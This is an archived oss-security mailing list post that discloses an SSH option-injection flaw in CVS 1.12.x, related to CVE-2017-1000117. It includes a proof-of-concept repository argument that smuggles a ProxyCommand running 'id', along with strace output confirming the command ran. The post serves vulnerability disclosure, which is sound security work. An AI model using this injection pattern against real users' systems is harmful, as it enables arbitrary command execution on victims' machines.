Openwall GNU/*/Linux - a small security-enhanced Linux distro for servers
[<prev] [next>] [thread-next>] [day] [month] [year] [list]
Date: Thu, 10 Aug 2017 17:32:24 -0600
From: Hank Leininger <hlein@...elogic.com>
To: oss-security@...ts.openwall.com
Subject: CVS and ssh command injection (see CVE-2017-1000117, etc.)

SSH command injection via -o... impacts CVS 1.12.x as well, if anybody
still cares.

The announcement for git mentions CVE-2017-1000117, CVE-2017-9800, and
CVE-2017-1000116 for git, Subversion, Mercurial, but makes no mention
of CVS.  None of those CVEs are currently viewable at
https://cve.mitre.org/cgi-bin/cvename.cgi?name= , and I don't know if
these were discussed on a private list prior to publication, and
whether that discussion included CVS.

CVS can be configured to use SSH for remote repos, such as with
CVS_RSH=ssh.  In which case specifying a hostname of -o... triggers the
same sort of thing:

  $ strace -f -e execve cvs -d '-oProxyCommand=id;localhost:/bar' co yada 2>&1 | egrep id
  execve("/usr/bin/cvs", ["cvs", "-d", "-oProxyCommand=id;localhost:/bar", "co", "yada"], 0x7ffe69f75a68 /* 139 vars */) = 0
  [snip]
  [pid 20003] execve("/usr/local/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = -1 ENOENT (No such file or directory)
  [pid 20003] execve("/usr/bin/ssh", ["ssh", "-oProxyCommand=id;localhost", "cvs server"], 0x5fb1fc8420 /* 141 vars */) = 0
  [pid 20004] execve("/bin/bash", ["/bin/bash", "-c", "exec id;localhost"], 0x32af5f10d0 /* 141 vars */) = 0
  [pid 20004] execve("/usr/bin/id", ["id"], 0xec92226ae0 /* 141 vars */) = 0
  [pid 20004] +++ exited with 0 +++
  [pid 20003] --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=20004, si_uid=3612, si_status=0, si_utime=0, si_stime=0} ---
  ssh_exchange_identification: Connection closed by remote host
  [pid 20003] +++ exited with 255 +++
  --- SIGCHLD {si_signo=SIGCHLD, si_code=CLD_EXITED, si_pid=20003, si_uid=3612, si_status=255, si_utime=0, si_stime=0} ---

Tested vanilla 1.12.13, and Gentoo 1.12.12-r11.

Of course, the repo specification looks very odd, so tricking a victim
may be harder than for SCM tools where it's prefixed by an ssh:// or
masked behind a redirect.  Plus, first you would have find a victim.

Thanks,

-- 

Hank Leininger <hlein@...elogic.com>
5F6D DCC8 FF53 8093 EC39  127B 091E 7F7C E898 E86C

[ CONTENT OF TYPE application/pgp-signature SKIPPED ]

Powered by blists - more mailing lists

Your e-mail address:

Please check out the Open Source Software Security Wiki, which is counterpart to this mailing list.

Powered by Openwall GNU/*/Linux - Powered by OpenVZ